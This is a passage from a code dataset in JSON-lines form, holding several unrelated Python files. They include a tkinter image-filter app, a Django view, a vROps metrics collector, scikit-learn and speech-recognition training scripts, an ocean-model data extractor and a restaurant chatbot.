openfilename()\r\n image=cv2.imread(x)\r\n Gaussian = cv2.blur(image, (9, 9))\r\n image = cv2.copyMakeBorder(Gaussian, 10, 10, 10, 10, cv2.BORDER_CONSTANT)\r\n cv2.imshow('Gaussian Blurring', image)\r\n cv2.waitKey(0)\r\ndef open_imgD():\r\n x = openfilename()\r\n img = Image.open(x)\r\n img = img.resize((500, 500), Image.ANTIALIAS)\r\n img = ImageTk.PhotoImage(img)\r\n panel=Label(root, image = img)\r\n panel.image = img\r\n panel.grid(row = 2)\r\ndef Grayscale():\r\n x = openfilename()\r\n img =cv2.imread(x)\r\n gray_image = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n image = cv2.copyMakeBorder(gray_image, 10, 10, 10, 10, cv2.BORDER_CONSTANT)\r\n cv2.imshow('Grayscale', image)\r\n cv2.waitKey(0) \r\n cv2.destroyAllWindows()\r\ndef openfilename():\r\n filename = filedialog.askopenfilename(title ='\"pen')\r\n return filename\r\ndef quit():\r\n global root\r\n root.destroy()\r\n\r\n\r\nroot = Tk()\r\nroot.title(\"Filters\")\r\nroot.geometry('1500x1500')\r\nroot.configure(background='yellow')\r\nroot.resizable(width = True, height = True)\r\n\r\nstyle = Style()\r\nstyle.configure('TButton',font =('italic',15,'bold'),background='black',foreground = 'black',width=35,height=10)\r\n\r\nbtn1= Button(root,text ='Cartoonify ',style='TButton' ,command = open_imgC).grid(padx=500,pady=50)\r\nbtn2= Button(root,text ='Blur ', style='TButton' ,command = Blur_image).grid (padx=500,pady=50)\r\nbtn3= Button(root,text ='GrayScale ',style='TButton' , command = Grayscale).grid (padx=500,pady=50)\r\nbtn4= Button(root,text ='Quit',style='TButton' , command = quit).grid (padx=500,pady=50)\r\n\r\n\r\nroot.mainloop()\r\n","sub_path":"ecom/filterspython.py","file_name":"filterspython.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"291325617","text":"from django.apps import apps\nget_model = apps.get_model\nfrom django.http import HttpResponse\nimport json\nimport uuid\n\nfrom smart_selects.utils import (get_keywords, sort_results, serialize_results,\n get_queryset)\n\n\nclass UUIDEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, uuid.UUID):\n return str(obj)\n else:\n return json.JSONEncoder.default(self, obj)\n\n\ndef filterchain(request, app, model, field, value, manager=None):\n model_class = get_model(app, model)\n keywords = get_keywords(field, value)\n queryset = get_queryset(model_class, manager)\n\n results = queryset.filter(**keywords)\n\n # Sort results if model doesn't include a default ordering.\n if not getattr(model_class._meta, 'ordering', False):\n results = list(results)\n sort_results(results)\n\n serialized_results = serialize_results(results)\n results_json = json.dumps(serialized_results, cls=UUIDEncoder)\n return HttpResponse(results_json, content_type='application/json')\n\n\ndef filterchain_all(request, app, model, field, value):\n \"\"\"Returns filtered results followed by excluded results below.\"\"\"\n\n model_class = get_model(app, model)\n keywords = get_keywords(field, value)\n queryset = get_queryset(model_class)\n\n filtered = list(queryset.filter(**keywords))\n sort_results(filtered)\n\n excluded = list(queryset.exclude(**keywords))\n sort_results(excluded)\n\n # Empty choice to separate filtered and excluded results.\n empty_choice = {'value': \"\", 'display': \"---------\"}\n\n serialized_results = (\n serialize_results(filtered) +\n [empty_choice] +\n serialize_results(excluded)\n )\n\n results_json = json.dumps(serialized_results, cls=UUIDEncoder)\n return HttpResponse(results_json, content_type='application/json')\n","sub_path":"smart_selects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"133377058","text":"from BaseCollector import BaseCollector\nfrom tools.Vrops import Vrops\nimport logging\n\nlogger = logging.getLogger('vrops-exporter')\n\n\nclass ClusterStatsCollector(BaseCollector):\n\n def __init__(self):\n super().__init__()\n self.vrops_entity_name = 'cluster'\n self.wait_for_inventory_data()\n self.name = self.__class__.__name__\n\n def collect(self):\n logger.info(f'{ self.name } starts with collecting the metrics')\n\n token = self.get_target_tokens()\n token = token.setdefault(self.target, None)\n\n if not token:\n logger.warning(f'skipping { self.target } in { self.name }, no token')\n return\n\n gauges = self.generate_gauges('stats', self.name, self.vrops_entity_name,\n ['vcenter', 'vccluster', 'datacenter'])\n if not gauges:\n return\n\n uuids = self.get_clusters_by_target()\n for metric_suffix in gauges:\n statkey = gauges[metric_suffix]['statkey']\n values = Vrops.get_latest_stat_multiple(self.target, token, uuids, statkey, self.name)\n if not values:\n logger.warning(f'Skipping statkey: {statkey} in {self.name} , no return')\n continue\n\n for value_entry in values:\n metric_value = value_entry['stat-list']['stat'][0]['data']\n if metric_value:\n metric_value = metric_value[0]\n cluster_id = value_entry['resourceId']\n gauges[metric_suffix]['gauge'].add_metric(\n labels=[self.clusters[cluster_id]['vcenter'],\n self.clusters[cluster_id]['name'],\n self.clusters[cluster_id]['parent_dc_name'].lower()],\n value=metric_value)\n\n for metric_suffix in gauges:\n yield gauges[metric_suffix]['gauge']\n","sub_path":"collectors/ClusterStatsCollector.py","file_name":"ClusterStatsCollector.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"438387824","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\n\"\"\"\r\ndemo07_boston.py 波士顿房屋价格预测\r\n\"\"\"\r\nimport sklearn.datasets as sd\r\nimport sklearn.utils as su\r\nimport sklearn.tree as st\r\nimport sklearn.metrics as sm\r\n\r\n# 加载波士顿地区房屋价格\r\nboston = sd.load_boston()\r\n# ['犯罪率' '住宅地比例' '商业用地比例' \r\n# '是否靠河' '空气质量' '房间数' '年限' \r\n# '距市中心的距离' '路网密度' '房产税' \r\n# '师生比' '黑人比例' '低地位人口比例']\r\n\r\nprint(boston.feature_names) # 特征名\r\nprint(boston.data.shape) # 数据的输入\r\nprint(boston.target.shape) # 数据的输出\r\n\r\n# 划分测试集与训练集 80%做训练\r\n# random_state 若打乱时使用的随机种子相同,\r\n# 则得到的结果相同。\r\nx, y = su.shuffle(boston.data, \r\n boston.target, random_state=7)\r\ntrain_size = int(len(x) * 0.8)\r\ntrain_x, test_x, train_y, test_y = \\\r\n x[:train_size], x[train_size:], \\\r\n y[:train_size], y[train_size:]\r\nprint(train_x.shape)\r\nprint(test_x.shape)\r\n\r\n# 基于决策树建模->训练模型->测试模型\r\nmodel = st.DecisionTreeRegressor(max_depth=4)\r\nmodel.fit(train_x, train_y)\r\npred_test_y = model.predict(test_x)\r\nprint(sm.r2_score(test_y, pred_test_y))\r\n\r\n# 基于正向激励模型预测房屋价格\r\nimport sklearn.ensemble as se\r\n\r\nmodel = se.AdaBoostRegressor(model, \r\n n_estimators=400, random_state=7)\r\nmodel.fit(train_x, train_y)\r\npred_test_y = model.predict(test_x)\r\nprint(sm.r2_score(test_y, pred_test_y))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"aid1901/day2/demo08_adaboost.py","file_name":"demo08_adaboost.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"64803778","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Train the model (TIMIT corpus).\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport time\nfrom setproctitle import setproctitle\nimport argparse\nfrom tensorboardX import SummaryWriter\nfrom tqdm import tqdm\nimport copy\n\nimport torch\ntorch.manual_seed(1623)\ntorch.cuda.manual_seed_all(1623)\n\nsys.path.append(os.path.abspath('../../../'))\nfrom models.load_model import load\nfrom examples.timit.s5.exp.dataset.load_dataset import Dataset\nfrom examples.timit.s5.exp.metrics.phone import eval_phone\nfrom utils.training.learning_rate_controller import Controller\nfrom utils.training.plot import plot_loss\nfrom utils.training.training_loop import train_step\nfrom utils.training.logging import set_logger\nfrom utils.directory import mkdir_join\nfrom utils.config import load_config, save_config\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--gpu', type=int, default=-1,\n help='the index of GPU (negative value indicates CPU)')\nparser.add_argument('--config_path', type=str, default=None,\n help='path to the configuration file')\nparser.add_argument('--data_save_path', type=str,\n help='path to saved data')\nparser.add_argument('--model_save_path', type=str, default=None,\n help='path to save the model')\nparser.add_argument('--saved_model_path', type=str, default=None,\n help='path to the saved model to retrain')\n\nMAX_DECODE_LEN_PHONE = 71\n\n\ndef main():\n\n args = parser.parse_args()\n\n ##################################################\n # DATSET\n ##################################################\n if args.model_save_path is not None:\n # Load a config file (.yml)\n params = load_config(args.config_path)\n # NOTE: Retrain the saved model from the last checkpoint\n elif args.saved_model_path is not None:\n params = load_config(os.path.join(args.saved_model_path, 'config.yml'))\n else:\n raise ValueError(\"Set model_save_path or saved_model_path.\")\n\n # Load dataset\n train_data = Dataset(\n data_save_path=args.data_save_path,\n backend=params['backend'],\n input_freq=params['input_freq'],\n use_delta=params['use_delta'],\n use_double_delta=params['use_double_delta'],\n data_type='train', label_type=params['label_type'],\n batch_size=params['batch_size'],\n max_epoch=params['num_epoch'], splice=params['splice'],\n num_stack=params['num_stack'], num_skip=params['num_skip'],\n sort_utt=True, sort_stop_epoch=params['sort_stop_epoch'],\n tool=params['tool'], num_enque=None,\n dynamic_batching=params['dynamic_batching'])\n dev_data = Dataset(\n data_save_path=args.data_save_path,\n backend=params['backend'],\n input_freq=params['input_freq'],\n use_delta=params['use_delta'],\n use_double_delta=params['use_double_delta'],\n data_type='dev', label_type=params['label_type'],\n batch_size=params['batch_size'], splice=params['splice'],\n num_stack=params['num_stack'], num_skip=params['num_skip'],\n shuffle=True, tool=params['tool'])\n test_data = Dataset(\n data_save_path=args.data_save_path,\n backend=params['backend'],\n input_freq=params['input_freq'],\n use_delta=params['use_delta'],\n use_double_delta=params['use_double_delta'],\n data_type='test', label_type=params['label_type'],\n batch_size=1, splice=params['splice'],\n num_stack=params['num_stack'], num_skip=params['num_skip'],\n tool=params['tool'])\n\n params['num_classes'] = train_data.num_classes\n\n ##################################################\n # MODEL\n ##################################################\n if args.model_save_path is not None:\n # Model setting\n model = load(model_type=params['model_type'],\n params=params,\n backend=params['backend'])\n\n # Set save path\n save_path = mkdir_join(\n args.model_save_path, params['backend'],\n params['model_type'], params['label_type'], model.name)\n model.set_save_path(save_path)\n\n # Save config file\n save_config(config_path=args.config_path, save_path=model.save_path)\n\n # Setting for logging\n logger = set_logger(model.save_path)\n\n if os.path.isdir(params['char_init']):\n # NOTE: Start training from the pre-trained character model\n model.load_checkpoint(\n save_path=params['char_init'], epoch=-1,\n load_pretrained_model=True)\n\n # Count total parameters\n for name in sorted(list(model.num_params_dict.keys())):\n num_params = model.num_params_dict[name]\n logger.info(\"%s %d\" % (name, num_params))\n logger.info(\"Total %.3f M parameters\" %\n (model.total_parameters / 1000000))\n\n # Define optimizer\n model.set_optimizer(\n optimizer=params['optimizer'],\n learning_rate_init=float(params['learning_rate']),\n weight_decay=float(params['weight_decay']),\n clip_grad_norm=params['clip_grad_norm'],\n lr_schedule=False,\n factor=params['decay_rate'],\n patience_epoch=params['decay_patient_epoch'])\n\n epoch, step = 1, 0\n learning_rate = float(params['learning_rate'])\n metric_dev_best = 1\n\n # NOTE: Retrain the saved model from the last checkpoint\n elif args.saved_model_path is not None:\n # Load model\n model = load(model_type=params['model_type'],\n params=params,\n backend=params['backend'])\n\n # Set save path\n model.save_path = args.saved_model_path\n\n # Setting for logging\n logger = set_logger(model.save_path)\n\n # Define optimizer\n model.set_optimizer(\n optimizer=params['optimizer'],\n learning_rate_init=float(params['learning_rate']), # on-the-fly\n weight_decay=float(params['weight_decay']),\n clip_grad_norm=params['clip_grad_norm'],\n lr_schedule=False,\n factor=params['decay_rate'],\n patience_epoch=params['decay_patient_epoch'])\n\n # Restore the last saved model\n epoch, step, learning_rate, metric_dev_best = model.load_checkpoint(\n save_path=args.saved_model_path, epoch=-1, restart=True)\n\n else:\n raise ValueError(\"Set model_save_path or saved_model_path.\")\n\n train_data.epoch = epoch - 1\n\n # GPU setting\n model.set_cuda(deterministic=False, benchmark=True)\n\n logger.info('PID: %s' % os.getpid())\n logger.info('USERNAME: %s' % os.uname()[1])\n\n # Set process name\n setproctitle('timit_' + params['backend'] + '_' +\n params['model_type'] + '_' + params['label_type'])\n\n ##################################################\n # TRAINING LOOP\n ##################################################\n # Define learning rate controller\n lr_controller = Controller(\n learning_rate_init=params['learning_rate'],\n backend=params['backend'],\n decay_type=params['decay_type'],\n decay_start_epoch=params['decay_start_epoch'],\n decay_rate=params['decay_rate'],\n decay_patient_epoch=params['decay_patient_epoch'],\n lower_better=True)\n\n # Setting for tensorboard\n if params['backend'] == 'pytorch':\n tf_writer = SummaryWriter(model.save_path)\n\n # Train model\n csv_steps, csv_loss_train, csv_loss_dev = [], [], []\n start_time_train = time.time()\n start_time_epoch = time.time()\n start_time_step = time.time()\n not_improved_epoch = 0\n loss_train_mean = 0.\n pbar_epoch = tqdm(total=len(train_data))\n best_model = None\n while True:\n # Compute loss in the training set (including parameter update)\n batch_train, is_new_epoch = train_data.next()\n model, loss_train_val = train_step(\n model, batch_train, params['clip_grad_norm'], params['backend'])\n loss_train_mean += loss_train_val\n\n pbar_epoch.update(len(batch_train['xs']))\n\n if (step + 1) % params['print_step'] == 0:\n\n # Compute loss in the dev set\n batch_dev = dev_data.next()[0]\n loss_dev = model(\n batch_dev['xs'], batch_dev['ys'],\n batch_dev['x_lens'], batch_dev['y_lens'], is_eval=True)\n\n loss_train_mean /= params['print_step']\n csv_steps.append(step)\n csv_loss_train.append(loss_train_mean)\n csv_loss_dev.append(loss_dev)\n\n # Logging by tensorboard\n if params['backend'] == 'pytorch':\n tf_writer.add_scalar('train/loss', loss_train_mean, step + 1)\n tf_writer.add_scalar('dev/loss', loss_dev, step + 1)\n for name, param in model.named_parameters():\n name = name.replace('.', '/')\n tf_writer.add_histogram(\n name, param.data.cpu().numpy(), step + 1)\n tf_writer.add_histogram(\n name + '/grad', param.grad.data.cpu().numpy(), step + 1)\n\n duration_step = time.time() - start_time_step\n logger.info(\"...Step:%d(epoch:%.3f) loss:%.3f(%.3f)/lr:%.5f/batch:%d/x_lens:%d (%.3f min)\" %\n (step + 1, train_data.epoch_detail,\n loss_train_mean, loss_dev,\n learning_rate, train_data.current_batch_size,\n max(batch_train['x_lens']) * params['num_stack'],\n duration_step / 60))\n start_time_step = time.time()\n loss_train_mean = 0.\n step += 1\n\n # Save checkpoint and evaluate model per epoch\n if is_new_epoch:\n duration_epoch = time.time() - start_time_epoch\n logger.info('===== EPOCH:%d (%.3f min) =====' %\n (epoch, duration_epoch / 60))\n\n # Save fugure of loss\n plot_loss(csv_loss_train, csv_loss_dev, csv_steps,\n save_path=model.save_path)\n\n if epoch < params['eval_start_epoch']:\n # Save the model\n model.save_checkpoint(model.save_path, epoch, step,\n learning_rate, metric_dev_best)\n else:\n start_time_eval = time.time()\n # dev\n per_dev_epoch, _ = eval_phone(\n model=model,\n dataset=dev_data,\n map_file_path='./conf/phones.60-48-39.map',\n eval_batch_size=1,\n beam_width=1,\n max_decode_len=MAX_DECODE_LEN_PHONE)\n logger.info(' PER (dev): %.3f %%' % (per_dev_epoch * 100))\n\n if per_dev_epoch < metric_dev_best:\n metric_dev_best = per_dev_epoch\n not_improved_epoch = 0\n best_model = copy.deepcopy(model)\n logger.info('||||| Best Score (PER) |||||')\n\n # Save the model\n model.save_checkpoint(model.save_path, epoch, step,\n learning_rate, metric_dev_best)\n\n # test\n per_test, _ = eval_phone(\n model=model,\n dataset=test_data,\n map_file_path='./conf/phones.60-48-39.map',\n eval_batch_size=1,\n beam_width=1,\n max_decode_len=MAX_DECODE_LEN_PHONE)\n logger.info(' PER (test): %.3f %%' % (per_test * 100))\n else:\n not_improved_epoch += 1\n\n duration_eval = time.time() - start_time_eval\n logger.info('Evaluation time: %.3f min' % (duration_eval / 60))\n\n # Early stopping\n if not_improved_epoch == params['not_improved_patient_epoch']:\n break\n\n # Update learning rate\n model.optimizer, learning_rate = lr_controller.decay_lr(\n optimizer=model.optimizer,\n learning_rate=learning_rate,\n epoch=epoch,\n value=per_dev_epoch)\n\n if epoch == params['convert_to_sgd_epoch']:\n # Convert to fine-tuning stage\n model.set_optimizer(\n 'sgd',\n learning_rate_init=learning_rate,\n weight_decay=float(params['weight_decay']),\n clip_grad_norm=params['clip_grad_norm'],\n lr_schedule=False,\n factor=params['decay_rate'],\n patience_epoch=params['decay_patient_epoch'])\n logger.info('========== Convert to SGD ==========')\n\n # Inject Gaussian noise to all parameters\n if float(params['weight_noise_std']) > 0:\n model.weight_noise_injection = True\n\n pbar_epoch = tqdm(total=len(train_data))\n print('========== EPOCH:%d (%.3f min) ==========' %\n (epoch, duration_epoch / 60))\n\n if epoch == params['num_epoch']:\n break\n\n start_time_step = time.time()\n start_time_epoch = time.time()\n epoch += 1\n\n duration_train = time.time() - start_time_train\n logger.info('Total time: %.3f hour' % (duration_train / 3600))\n\n if params['backend'] == 'pytorch':\n tf_writer.close()\n pbar_epoch.close()\n\n # Evaluate the best model by beam search\n per_test_best, _ = eval_phone(\n model=best_model,\n dataset=test_data,\n beam_width=10,\n max_decode_len=MAX_DECODE_LEN_PHONE,\n eval_batch_size=1,\n map_file_path='./conf/phones.60-48-39.map')\n logger.info(' PER (test, beam: 10): %.3f %%' %\n (per_test_best * 100))\n\n # Training was finished correctly\n with open(os.path.join(model.save_path, 'COMPLETE'), 'w') as f:\n f.write('')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/timit/s5/exp/training/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"510056460","text":"def main():\n array= [] \n n = int(input(\"Insira a quantidade de elementos do array: \")) \n\n for _ in range(n): \n element = int(input(\"Insira o elemento: \"))\n array.append(element) \n print(\"Menor valor do array:\",min(array))\n print(\"Maior valor do array:\",max(array))\n\n\nmain()","sub_path":"Vetores e Matrizes/pos_elementos_menor_maior.py","file_name":"pos_elementos_menor_maior.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"392599273","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib as mpl\nimport datetime as dt\nfrom salishsea_tools import evaltools as et, places, viz_tools, visualisations\nimport xarray as xr\nimport pandas as pd\nimport pickle\nimport os\nimport bloomdrivers\n\n\ndef extract_loc(basedir,start,end,ij,ii,jw,iw,savepath):\n with xr.open_dataset('/data/vdo/MEOPAR/NEMO-forcing/grid/mesh_mask201702.nc') as mesh:\n tmask=np.array(mesh.tmask)\n gdept_1d=np.array(mesh.gdept_1d)\n e3t_0=np.array(mesh.e3t_0)\n nam_fmt='nowcast'\n flen=1 # files contain 1 day of data each\n ftype= 'ptrc_T' # load bio files\n tres=24 # 1: hourly resolution; 24: daily resolution \n flist=et.index_model_files(start,end,basedir,nam_fmt,flen,ftype,tres)\n flist3 = et.index_model_files(start,end,basedir,nam_fmt,flen,\"grid_T\",tres)\n fliste3t = et.index_model_files(start,end,basedir,nam_fmt,flen,\"carp_T\",tres)\n\n ik=0\n with xr.open_mfdataset(flist['paths']) as bio:\n bio_time=np.array(bio.time_centered[:])\n no3_alld=np.array(bio.nitrate.isel(y=ij,x=ii)) \n diat_alld=np.array(bio.diatoms.isel(y=ij,x=ii))\n flag_alld=np.array(bio.flagellates.isel(y=ij,x=ii))\n cili_alld=np.array(bio.ciliates.isel(y=ij,x=ii))\n microzoo_alld=np.array(bio.microzooplankton.isel(y=ij,x=ii))\n mesozoo_alld=np.array(bio.mesozooplankton.isel(y=ij,x=ii))\n print('bio done')\n with xr.open_mfdataset(fliste3t['paths']) as carp:\n intdiat=np.array(np.sum(bio.diatoms.isel(y=ij,x=ii)*carp.e3t.isel(y=ij,x=ii),1)) # depth integrated diatom\n intphyto=np.array(np.sum((bio.diatoms.isel(y=ij,x=ii)+bio.flagellates.isel(y=ij,x=ii)\\\n +bio.ciliates.isel(y=ij,x=ii))*carp.e3t.isel(y=ij,x=ii),1))\n spar=np.array(carp.PAR.isel(deptht=ik,y=ij,x=ii))\n intmesoz=np.array(np.sum(bio.mesozooplankton.isel(y=ij,x=ii)*carp.e3t.isel(y=ij,x=ii),1))\n intmicroz=np.array(np.sum(bio.microzooplankton.isel(y=ij,x=ii)*carp.e3t.isel(y=ij,x=ii),1))\n print('carp done')\n with xr.open_mfdataset(flist3['paths']) as grid:\n grid_time=np.array(grid.time_centered[:])\n temp=np.array(grid.votemper.isel(deptht=ik,y=ij,x=ii)) #surface temperature\n salinity=np.array(grid.vosaline.isel(deptht=ik,y=ij,x=ii)) #surface salinity\n\n opsdir='/results/forcing/atmospheric/GEM2.5/operational'\n\n flist2=et.index_model_files(start,end,opsdir,nam_fmt='ops',flen=1,ftype='None',tres=24)\n with xr.open_mfdataset(flist2['paths']) as winds:\n u_wind=np.array(winds.u_wind.isel(y=jw,x=iw))\n v_wind=np.array(winds.v_wind.isel(y=jw,x=iw))\n twind=np.array(winds.time_counter)\n solar=np.array(winds.solar.isel(y=jw,x=iw))\n\n allvars=(bio_time,diat_alld,no3_alld,flag_alld,cili_alld,microzoo_alld,mesozoo_alld,\n intdiat,intphyto,spar,intmesoz,intmicroz,\n grid_time,temp,salinity,u_wind,v_wind,twind,solar)\n pickle.dump(allvars,open(savepath,'wb'))\n\n\ndef runS3_1812_2015():\n # you could edit this to accept dates/locations as input and loop through them to extract all files\n\n start=dt.datetime(2015,1,1)\n end=dt.datetime(2015,4,1)\n year=str(start.year)\n modver='201812'\n loc='S3'\n ij,ii=places.PLACES['S3']['NEMO grid ji']\n # GEM2.5 grid ji is atm forcing grid for ops files\n jw,iw=places.PLACES['S3']['GEM2.5 grid ji']\n \n #savedir='/ocean/aisabell/MEOPAR/extracted_files'\n savedir='/ocean/eolson/MEOPAR/'\n \n fname=f'testJanToMarch_TimeSeries_{year}_{loc}_{modver}.pkl'\n savepath=os.path.join(savedir,fname)\n loc='S3'\n \n basedir='/results/SalishSea/nowcast-green.201812/'\n\n extract_loc(basedir,start,end,ij,ii,jw,iw,savepath)\n\nif __name__ == \"__main__\":\n runS3_1812_2015()\n","sub_path":"notebooks/forAline/extractloc2.py","file_name":"extractloc2.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"586459364","text":"import os\nimport argparse\nimport time\n\nfrom nlp import load_train_data, nlp_stupid, nlp_base, nlp_key, train_decision_tree, train_neuralnetwork, train_logistic_regression, number_to_word\nfrom dialog_manager import state_transition\n\n#to run this code, please CD to the correct file and run \n#python chatbot.py \n#or \n#python3 chatbot.py\n\n#you can also switch on some configurations with: \n#-c (system answers all utterances in capslog will be swtiched on)\n#-f (formal response will be switched on)\n#-a (the dialog acts will be shown as well will be swtiched on)\n#example of running it:\n#python chatbot.py -c -f -a \n#or \n#python3 chatbot.py -c -f -a\n\n# This is the first message you see when running the code\nWELCOME_MESSAGE = \"\"\"\nWelcome! This is a beautiful chatbot named KASA.\n\nHowever.. it is as smart as you want it to be. So choose wisely!\n\nIf you have had enough of the chatbot, simply type bye,\nand it will shut up. You will be redirected to the survey at the end.\n\n\"\"\"\n\n# This code makes it possible to add arguments to your runcode\nparser = argparse.ArgumentParser(\n description='MAIR chatbot project.'\n)\n\n# This part makes it possible to choose between capital letters or lower letters\nparser.add_argument(\n '-c', '--caps', \n action = 'store_true', \n help='By using -c the bot will only respond in caps' \n)\n\n# This determines whether the response is formal or not\nparser.add_argument(\n '-f', '--formal',\n action = 'store_true',\n help='By using -f the bot will give formal responds'\n)\n\n# This determines whether we see the dialog acts in the conversation or not\nparser.add_argument(\n '-a', '--acts',\n action = 'store_true',\n help='By using -a the bot will also show you the acts'\n)\n\nargs = parser.parse_args()\n\n# This displays the conversation that is extracted in chat_client\ndef display_convo(convo, show_acts, max_sentences=10):\n # max_sentences is a hyperparameter\n os.system('clear')\n \n print(0*'\\n')\n print(40*'#' + ' KASA ' + 40*'#')\n \n # To create a conversation within the borders of the terminal\n if len(convo) < max_sentences:\n print(3 * (max_sentences - len(convo)) * '\\n')\n \n # To create a conversation within the borders of the terminal\n if len(convo) > 0: \n for i in range(0, min(len(convo), max_sentences)):\n i += max(0, len(convo) - max_sentences)\n print('> {}'.format(convo[i]['user']))\n print('--> {}'.format(convo[i]['bot']))\n if show_acts:\n print('speech act:({})'.format(convo[i]['act']))\n print()\n\n# This creates the dialog\ndef chat_client(method, caps, formal, show_acts, name):\n \n keep_chatting = True\n state = 1 # to set the start state\n preferences = {} # Initiate preference\n restaurants = []\n additional_pref = list()\n result = ''\n t0 = time.time()\n\n if formal:\n beginconvo = 'Hello, welcome to KASA! \\n You can ask for restaurants by area, price range or food type. How may I help you?'\n else:\n beginconvo = 'Hey there!!! Welcome to KASA! \\n You can ask for restaurants by area, price range, or food type. Let\\'s go, enter your request! :)'\n \n if caps:\n beginconvo = beginconvo.upper()\n \n convo = []\n\n \n #The first interation so that we know to which bot we are talking and what is asked from the user\n if show_acts:\n convo.append({\n 'user': 'You are talking to the {} bot'.format(name),\n 'bot': beginconvo,\n 'act': ''\n })\n else:\n convo.append({\n 'user': 'You are talking to the {} bot'.format(name),\n 'bot': beginconvo\n })\n \n # During the conversation\n while keep_chatting:\n \n display_convo(convo, show_acts)\n \n user_input = input('> ')\n \n #Extra to always be able to leave the bot\n if user_input.lower() == 'abort' or user_input.lower() == 'exit':\n message = '--> bye bye, hope to see you again soon!'\n state = 9\n if caps:\n print(message.upper())\n else:\n print(message) \n #exit(0)\n \n act = method(user_input)\n # By talking to the dialog manager we get the neccessary information and response back for the conversation\n state, client_output, preferences, restaurants, result = state_transition(user_input, state, act, preferences, restaurants, result, additional_pref, formal, convo, t0) \n \n # Make output caps if its true\n if caps:\n client_output = client_output.upper()\n\n # Creating the right conversation logs for show_acts = true or not\n if show_acts:\n convo.append({\n 'user': user_input,\n 'bot': client_output,\n 'act': act\n })\n else:\n convo.append({\n 'user': user_input,\n 'bot': client_output\n })\n \n return\n\ndef main(caps, formal, show_acts):\n os.system('clear')\n\n # Will happen more often when bot text is shown and caps=True\n if caps:\n print(WELCOME_MESSAGE.upper())\n else:\n print(WELCOME_MESSAGE)\n \n data, training = load_train_data(os.path.join('dialog_acts.dat')) # Create the neccessary datasets\n \n #In this loop we will train the models based on the input.\n while True:\n method = input('Choose a method for your bot. The options are: \\n(s)tupid, (b)ase, (k)ey, (t)ree, (n)eural, (l)ogistic \\n> ')\n\n if method.lower() == 's' or method.lower() == 'stupid': # This is the extremely stupid bot that does nothing correct\n algo = lambda x: nlp_stupid(x)\n break\n if method.lower() == 'b' or method.lower() == 'base': # This is the base which only predicts the majority class\n algo = lambda x: nlp_base(data)\n break\n if method.lower() == 'k' or method.lower() == 'key': # This other base is completely based on keyword detection\n algo = lambda x: nlp_key(x, training)\n break \n if method.lower() == 't' or method.lower() == 'tree': # This is our Decision Tree model\n model, enc, bow, x_test, y_test = train_decision_tree(data)\n algo = lambda x: number_to_word(x, model, enc, bow)\n break\n if method.lower() == 'n' or method.lower() == 'neural': # This is our Neural Network model\n message = '\\nThanks for choosing my brain! Let me get those gears oiled up and ready to grind, give me a few seconds.'\n if caps: # We need to use CAPS for everything that seems like a text from the bot when caps = true\n print(message.upper())\n else:\n print(message)\n model, enc, bow, x_test, y_test = train_neuralnetwork(data)\n algo = lambda x: number_to_word(x, model, enc, bow) # For vector translation to words\n break\n if method.lower() == 'l' or method.lower() == 'logistic': # This is our Logistic regression model\n message = '\\nGive me a few seconds to become a very logical being, capable of helping you out with all your restaurant related questions! You\\'re welcome! :)'\n if caps: # We need to use CAPS for everything that seems like a text from the bot when caps = true\n print(message.upper())\n else:\n print(message) \n model, enc, bow, x_test, y_test = train_logistic_regression(data)\n algo = lambda x: number_to_word(x, model, enc, bow) # For vector translation to words\n break\n \n os.system('clear')\n \n # If nothing of the above happens, we stay in the loop, but display a new message to indicate that the input did not suffice\n print(WELCOME_MESSAGE)\n print('WHOOPS... that method is NOT recognized.')\n print()\n \n os.system('clear')\n \n #Here we will make the UI\n chat_client(algo, caps, formal, show_acts, method) # We only need to train our model once and give it to the chat_client\n \nif __name__ == '__main__':\n main(args.caps, args.formal, args.acts) # To give these booleans to the main function\n \n ","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":8536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"219329349","text":"\nimport sys\n\n#sys.path.append(\n# '/home/jbs/develop.old/articles/201509_python_exercises_generator')\n\n#sys.path.append('/home/jbs/develop/201902_questions_transformer')\nsys.path.append('../qom_questions_transformer')\n\nimport string\nfrom random import sample\nfrom random import choice\nfrom random import randint\nfrom random import shuffle\n\nfrom text_transformer.tt_text_transformer_interface import add_changeable\n#from text_transformer.tt_text_transformer_interface import change_all_occurrences\nfrom text_transformer.tt_text_transformer_interface import change_one_occurrence\n\n# # this import removes an import error. I don't know why (jbs\n# # 2018/12/12). see pt_import_tests.py and try to correct the problem.\n# import py_transformer.ast_processor\n\n# from python_transformer.pt_python_transformer_interface import change_identifier_all_occurrences\n# from python_transformer.pt_python_transformer_interface import change_all_occurrences_in_strings\nfrom 